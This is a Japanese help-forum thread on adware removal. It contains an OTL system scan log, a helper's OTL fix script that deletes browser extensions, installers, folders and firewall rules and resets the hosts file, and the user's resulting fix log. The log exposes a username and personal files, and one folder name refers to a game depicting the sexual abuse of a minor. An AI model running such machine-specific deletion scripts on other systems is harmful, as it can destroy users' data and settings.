[2012/12/13 15:28:00 | 012,706,828 | ---- | C] () -- C:\Users\ryota\03 Another Heaven.mp3
[2012/12/13 15:28:00 | 010,296,232 | ---- | C] () -- C:\Users\ryota\06 Ｋａｌｅｉｄｏｓｃｏｐｅ（ｔｒａｎｓｐａｒｅｎｔ　ｍｉｘ｜Ｂｏｎｕｓ　Ｔｒａｃｋ）.mp3
[2012/12/13 15:28:00 | 009,962,152 | ---- | C] () -- C:\Users\ryota\05 ARCADIA-Instrumental-.mp3
[2012/12/13 15:28:00 | 009,877,588 | ---- | C] () -- C:\Users\ryota\02 HORIZON.mp3
[2012/12/13 15:28:00 | 009,842,092 | ---- | C] () -- C:\Users\ryota\01 ARCADIA.mp3
[2012/12/13 15:28:00 | 003,751,396 | ---- | C] () -- C:\Users\ryota\04 ARCADIA-game Ver.-.mp3
[2012/10/31 18:22:16 | 000,003,077 | ---- | C] () -- C:\ProgramData\cfSB1290.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2015/04/20 22:45:57 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 02:40:58 | 022,291,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 02:34:06 | 019,731,824 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2014/10/29 10:19:43 | 001,013,760 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2014/10/29 09:59:23 | 000,786,944 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2014/10/29 10:16:01 | 000,512,512 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/04/21 19:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/21 08:59:00 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 19:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000AAKX-00ERMA0
Partitions: 5
Status: OK
Status Info: 0

Drive: \\\\.\\PHYSICALDRIVE1 -
Interface type: USB
Media Type:
Model: Multi Flash Reader USB Device
Partitions: 0
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 300.00MB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: GPT: System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 315621376
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 8.00GB
Starting Offset: 554696704
Hidden sectors: 0


DeviceID: Disk #0, Partition #3
PartitionType: GPT: Basic Data
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 457.00GB
Starting Offset: 8943304704
Hidden sectors: 0


DeviceID: Disk #0, Partition #4
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 456.00MB
Starting Offset: 499629686784
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2014/10/29 11:42:20 | 000,214,528 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:33 | 000,110,080 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2014/10/29 10:21:02 | 000,096,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:34 | 000,933,376 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:40 | 000,845,312 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV - [2014/10/29 10:01:27 | 000,046,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:28 | 000,516,608 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2014/10/29 09:55:10 | 000,367,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:50 | 000,135,168 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:24 | 000,131,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:06 | 000,365,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2014/10/29 10:05:58 | 000,292,864 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:41 | 000,252,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2014/10/29 10:14:35 | 000,110,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\eapsvc.dll -- (Eaphost)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:23 | 000,033,792 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2014/10/29 10:59:46 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:07:58 | 000,452,608 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2014/10/29 10:08:58 | 000,397,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:[b]64bit:[/b] - [2014/10/29 10:01:45 | 000,706,048 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:44 | 000,071,168 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2014/10/29 09:51:03 | 000,266,752 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 10:41:58 | 000,391,680 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:16 | 000,028,672 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2014/10/29 11:45:24 | 000,116,736 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2014/10/29 09:54:15 | 000,827,392 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
No service found with a name of ProtectedStorage
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2014/10/29 11:34:42 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:21 | 000,542,208 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:25 | 000,031,744 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2014/10/29 12:51:48 | 000,047,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2014/10/29 09:56:06 | 000,146,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:49 | 000,329,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2014/10/29 10:04:06 | 000,640,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2014/10/29 09:49:09 | 000,576,512 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2014/10/29 09:52:52 | 001,265,152 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2014/10/29 11:12:14 | 000,313,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2014/10/29 10:34:59 | 000,254,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:29 | 000,059,392 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/09 10:50:34 | 000,225,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:28 | 001,454,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:48 | 000,911,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (Audiosrv)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
No service found with a name of SDRSVC
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:27 | 001,696,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (EventLog)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:44 | 000,880,640 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:59:24 | 000,670,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:35:14 | 000,064,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\msiexec.exe -- (msiserver)
SRV - [2014/10/29 10:52:53 | 000,059,904 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:13 | 000,230,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/14 09:22:58 | 003,678,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:53:17 | 000,262,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2014/10/29 10:03:56 | 001,547,264 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlansvc.dll -- (WlanSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:29 | 000,289,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]
[2007/11/20 23:08:08 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
[2010/07/08 01:11:00 | 000,183,296 | R--- | M] (I-O DATA DEVICE,INC.) -- C:\IOOCI.EXE

[color=#E56717]========== Files - Unicode (All) ==========[/color]
(C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游??器 3) -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游浏览器 3

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720

< End of report >

Firefoxの問題点は解決した模様です。
HPは不要ですので、導入時の指示に従って削除なされてください。

メモ帳を起動させ、以下をコピペしてください。
なお、:OTL、:Files、:Commands等はOTLでの処理方法を決める命令文です。
削除なされないようご注意ください。

------コピペこの下より------
:OTL
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OCustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OSearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://home.kingsoft.jp [binary data]
CHR - Extension: Twitch Stream = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207\
CHR - Extension: Dropmark sidebar = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171\
CHR - Extension: BlocKUTubEADi = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0\
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
[2015/04/04 21:21:57 | 010,285,040 | ---- | C] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 18:08:59 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JWord(日本語キーワード)
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job

:files
c:\programdata\cjhlcgankhfaeohlngbhkhbnhmhaokmc
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\fjaicoojlfoococemdcaollmhaiolole
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\foiapgoppijipmmgkaibacckkhbngfhp
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\geoafhlnmffijlblgohnpmjfbnpcpadd
c:\users\ryota\downloads\tw628j.exe
c:\users\ryota\downloads\cr_downloader_for_super-smash-bros..exe
c:\users\ryota\downloads\dtlite4491-0356.exe
c:\users\ryota\downloads\daemon347_inst.exe
c:\users\ryota\downloads\fileopenersetup.exe
c:\users\ryota\downloads\freemakeaudioconvertersetup.exe
c:\users\ryota\downloads\downloadmanagersetup.exe
c:\users\ryota\downloads\adlsoft_uncompressor_v2_3.exe
c:\users\ryota\downloads\ccsetup404.exe
c:\users\ryota\downloads\codecpackage.exe
c:\users\ryota\downloads\downloader_for_shaman%20king%20card%20game%20-%20chou%20senjiryakketsu%202%20%28japan%29(1).exe
c:\users\ryota\downloads\downloader_for_shaman%20king%20card%20game%20-%20chou%20senjiryakketsu%202%20%28japan%29.exe
c:\users\ryota\downloads\dtlite4454-0314.exe
c:\users\ryota\downloads\file_opener.exe
c:\users\ryota\downloads\installer_manycam_3_0_92_japanese.exe
c:\users\ryota\downloads\rcpsetupdsnr_ds367212.exe
c:\users\ryota\downloads\setup.exe
c:\users\ryota\downloads\vlcmediaplayersetup-6zgtwof.exe
c:\users\ryota\downloads\vlcmediaplayersetup.exe
c:\users\ryota\desktop\xxxx\babel19sample
c:\users\ryota\desktop\xxxx\kontrapunkt_trial\kontrapunkt.exe
c:\users\ryota\desktop\実況\chorokuf\jword_plugin.exe
c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll
c:\programdata\application data\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}
c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll
c:\programdata\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa
c:\downloads
c:\program files (x86)\daemon tools lite
c:\program files (x86)\segmentamplifier
c:\users\ryota\downloads\utorrent.exe
c:\windows\system32\dmwu.exe

:Reg
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0BB8AC33-4C3D-426C-8439-A58A243DDC61}"=-
"{E0D4F4A4-50DB-4E61-A9A6-97D2145A436B}"=-
"{E6A917C9-2D7C-44DA-ADC3-F27BAC54466A}"=-
"{E6B916CF-2E4B-4E04-A2D0-24AF907AFED6}"=-

:Commands
[purity]
[resethosts]
[emptyflash]
[emptyjava]
[emptytemp]
[createrestorepoint]
[reboot]
------コピペこの上まで------

コピペが完了しましたら、分かりやすいお名前をつけて保存してください。
その後、PCをセーフモードで起動させてください。
再度OTLを起動させ、Custom Scan/Fixesの項目内に上記で保存した内容をコピペしてください。
今回は駆除作業のため、その他のチェック項目はありません。
赤い文字の[Run Fix]をクリックして処置を開始してください。
OTLの処置に従って進めてゆき、通常モードで再起動を行う前後いずれかに処置ログが表示されますので、
そちらのログを貼り付けてご連絡ください。
またその際に状況報告もお願いいたします。

とりあえず上記の処置は終わりました。
現在の状況はあまり大きな変化はなく依然として広告やポップアップが出現します。
間が空いたときに状況が悪化したと言っていましたが、その際に別のページに強制的に飛ばされるといったことも増えたことを伝えてなかったので追記します。

以下
OTLログ

All processes killed
========== OTL ==========
HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\\CustomizeSearch| /E : value set successfully!
HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\\OCustomizeSearch| /E : value set successfully!
HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\\OSearchAssistant| /E : value set successfully!
HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\\SearchAssistant| /E : value set successfully!
HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main\\Secondary Start Pages| /E : value set successfully!
C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207 folder moved successfully.
C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171 folder moved successfully.
C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0 folder moved successfully.
Registry value HKEY_USERS\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Run\\DAEMON Tools Lite deleted successfully.
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe moved successfully.
C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe moved successfully.
C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JWord(日本語キーワード) folder moved successfully.
C:\Windows\Tasks\Price Meter Updater.job moved successfully.
========== FILES ==========
c:\programdata\cjhlcgankhfaeohlngbhkhbnhmhaokmc folder moved successfully.
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\fjaicoojlfoococemdcaollmhaiolole folder moved successfully.
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\foiapgoppijipmmgkaibacckkhbngfhp folder moved successfully.
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\geoafhlnmffijlblgohnpmjfbnpcpadd folder moved successfully.
c:\users\ryota\downloads\TW628J.exe moved successfully.
c:\users\ryota\downloads\CR_Downloader_for_super-smash-bros..exe moved successfully.
c:\users\ryota\downloads\DTLite4491-0356.exe moved successfully.
c:\users\ryota\downloads\daemon347_inst.exe moved successfully.
c:\users\ryota\downloads\FileOpenerSetup.exe moved successfully.
c:\users\ryota\downloads\FreemakeAudioConverterSetup.exe moved successfully.
c:\users\ryota\downloads\DownloadManagerSetup.exe moved successfully.
c:\users\ryota\downloads\ADLSoft_UnCompressor_v2_3.exe moved successfully.
c:\users\ryota\downloads\ccsetup404.exe moved successfully.
c:\users\ryota\downloads\CodecPackage.exe moved successfully.
c:\users\ryota\downloads\Downloader_for_Shaman%20King%20Card%20Game%20-%20Chou%20Senjiryakketsu%202%20%28Japan%29(1).exe moved successfully.
c:\users\ryota\downloads\Downloader_for_Shaman%20King%20Card%20Game%20-%20Chou%20Senjiryakketsu%202%20%28Japan%29.exe moved successfully.
c:\users\ryota\downloads\DTLite4454-0314.exe moved successfully.
c:\users\ryota\downloads\File_Opener.exe moved successfully.
c:\users\ryota\downloads\installer_manycam_3_0_92_Japanese.exe moved successfully.
c:\users\ryota\downloads\rcpsetupdsnr_ds367212.exe moved successfully.
c:\users\ryota\downloads\Setup.exe moved successfully.
c:\users\ryota\downloads\VLCMediaPlayerSetup-6ZgtwOf.exe moved successfully.
c:\users\ryota\downloads\VLCMediaPlayerSetup.exe moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\ＪＣ拉致監禁レイプ_体験版\savedata folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\ＪＣ拉致監禁レイプ_体験版 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\脳内 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\savedata folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\tmp folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00010000\5358344a\data folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00010000\5358344a\content folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00010000\5358344a folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00010000 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00000001\00000002\data folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00000001\00000002 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00000001 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\sys folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\wc24\mbox folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\wc24 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\sys folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\succession folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\ec folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\StateSaves folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Shaders folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\ShaderCache folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\ScreenShots folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\OpenCL folder moved successfully.
